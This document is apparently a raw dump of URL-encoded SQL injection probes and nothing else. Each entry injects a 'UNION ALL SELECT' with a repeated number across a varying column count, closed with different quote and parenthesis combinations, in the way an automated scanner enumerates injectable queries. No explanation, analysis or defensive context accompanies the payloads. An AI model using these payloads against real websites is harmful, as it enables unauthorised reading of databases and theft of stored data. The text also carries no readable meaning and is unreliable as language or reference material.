-7604%27%20UNION%20ALL%20SELECT%208572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572%2C8572--%20 -8558%27%20UNION%20ALL%20SELECT%208113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113%2C8113--%20 -1601%27%20UNION%20ALL%20SELECT%209768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768--%20 -7448%27%20UNION%20ALL%20SELECT%204015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015%2C4015--%20 -2103%27%29%20UNION%20ALL%20SELECT%209638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638%2C9638--%20 -7263%27%29%20UNION%20ALL%20SELECT%207788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788--%20 -9624%27%29%20UNION%20ALL%20SELECT%201285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285--%20 -1135%27%29%20UNION%20ALL%20SELECT%207882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882--%20 -6007%27%29%20UNION%20ALL%20SELECT%202878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878%2C2878--%20 -8665%27%29%20UNION%20ALL%20SELECT%202550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550%2C2550--%20 -4532%27%29%20UNION%20ALL%20SELECT%202859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859%2C2859--%20 -8955%27%29%20UNION%20ALL%20SELECT%207525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525--%20 -4962%27%29%20UNION%20ALL%20SELECT%204937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937--%20 -4475%27%29%20UNION%20ALL%20SELECT%209403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403%2C9403--%20 -7610%27%29%29%20UNION%20ALL%20SELECT%203633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633%2C3633--%20 -3376%27%29%29%20UNION%20ALL%20SELECT%204884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884%2C4884--%20 -1079%27%29%29%20UNION%20ALL%20SELECT%206412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412%2C6412--%20 -4439%27%29%29%20UNION%20ALL%20SELECT%204353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353--%20 -7545%27%29%29%20UNION%20ALL%20SELECT%208524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524--%20 -7426%27%29%29%20UNION%20ALL%20SELECT%201424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424--%20 -2415%27%29%29%20UNION%20ALL%20SELECT%209457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457%2C9457--%20 -7634%27%29%29%20UNION%20ALL%20SELECT%205108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108%2C5108--%20 -4222%27%29%29%20UNION%20ALL%20SELECT%206310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310%2C6310--%20 -8006%27%29%29%20UNION%20ALL%20SELECT%205194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194--%20 -4941%27%29%29%29%20UNION%20ALL%20SELECT%207195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195%2C7195--%20 -2869%27%29%29%29%20UNION%20ALL%20SELECT%203581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581%2C3581--%20 -5128%27%29%29%29%20UNION%20ALL%20SELECT%201929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929--%20 -1405%27%29%29%29%20UNION%20ALL%20SELECT%205363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363--%20 -7776%27%29%29%29%20UNION%20ALL%20SELECT%202399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399--%20 -8062%27%29%29%29%20UNION%20ALL%20SELECT%208269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269%2C8269--%20 -6625%27%29%29%29%20UNION%20ALL%20SELECT%206956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956%2C6956--%20 -1035%27%29%29%29%20UNION%20ALL%20SELECT%208477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477%2C8477--%20 -3420%27%29%29%29%20UNION%20ALL%20SELECT%205675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675--%20 -1842%27%29%29%29%20UNION%20ALL%20SELECT%201729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729%2C1729--%20 -7610%27%20UNION%20ALL%20SELECT%204161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161--%20 -1610%27%20UNION%20ALL%20SELECT%202767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767--%20 -5524%27%20UNION%20ALL%20SELECT%205878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878--%20 -5763%27%20UNION%20ALL%20SELECT%207117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117%2C7117--%20 -5219%27%20UNION%20ALL%20SELECT%204724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724--%20 -8776%27%20UNION%20ALL%20SELECT%204603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603%2C4603--%20 -7357%27%20UNION%20ALL%20SELECT%202791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791--%20 -4236%27%20UNION%20ALL%20SELECT%202824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824--%20 -8953%27%20UNION%20ALL%20SELECT%204783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783%2C4783--%20 -4673%27%20UNION%20ALL%20SELECT%201003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003%2C1003--%20 -8495%22%29%20UNION%20ALL%20SELECT%208648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648%2C8648--%20 -5755%22%29%20UNION%20ALL%20SELECT%203384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384--%20 -7297%22%29%20UNION%20ALL%20SELECT%206258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258--%20 -6846%22%29%20UNION%20ALL%20SELECT%209479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479%2C9479--%20 -3240%22%29%20UNION%20ALL%20SELECT%202392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392--%20 -3026%22%29%20UNION%20ALL%20SELECT%201865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865%2C1865--%20 -7553%22%29%20UNION%20ALL%20SELECT%207436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436--%20 -3531%22%29%20UNION%20ALL%20SELECT%201644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644%2C1644--%20 -3084%22%29%20UNION%20ALL%20SELECT%205833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833--%20 -5384%22%29%20UNION%20ALL%20SELECT%204233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233%2C4233--%20 -1864%22%29%29%20UNION%20ALL%20SELECT%201639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639--%20 -8722%22%29%29%20UNION%20ALL%20SELECT%206988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988%2C6988--%20 -5295%22%29%29%20UNION%20ALL%20SELECT%201473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473%2C1473--%20 -4579%22%29%29%20UNION%20ALL%20SELECT%205927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927%2C5927--%20 -5139%22%29%29%20UNION%20ALL%20SELECT%209286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286%2C9286--%20 -6077%22%29%29%20UNION%20ALL%20SELECT%201977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977%2C1977--%20 -2809%22%29%29%20UNION%20ALL%20SELECT%204302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302%2C4302--%20 -2785%22%29%29%20UNION%20ALL%20SELECT%202726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726--%20 -8474%22%29%29%20UNION%20ALL%20SELECT%209521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521--%20 -3510%22%29%29%20UNION%20ALL%20SELECT%201254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254%2C1254--%20 -9147%22%29%29%29%20UNION%20ALL%20SELECT%202622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622%2C2622--%20 -4417%22%29%29%29%20UNION%20ALL%20SELECT%202831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831%2C2831--%20 -6368%22%29%29%29%20UNION%20ALL%20SELECT%203448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448%2C3448--%20 -4565%22%29%29%29%20UNION%20ALL%20SELECT%207243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243%2C7243--%20 -5789%22%29%29%29%20UNION%20ALL%20SELECT%207643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643%2C7643--%20 -6546%22%29%29%29%20UNION%20ALL%20SELECT%209537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537%2C9537--%20 -8153%22%29%29%29%20UNION%20ALL%20SELECT%201808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808--%20 -6880%22%29%29%29%20UNION%20ALL%20SELECT%209578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578--%20 -7065%22%29%29%29%20UNION%20ALL%20SELECT%209382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382%2C9382--%20 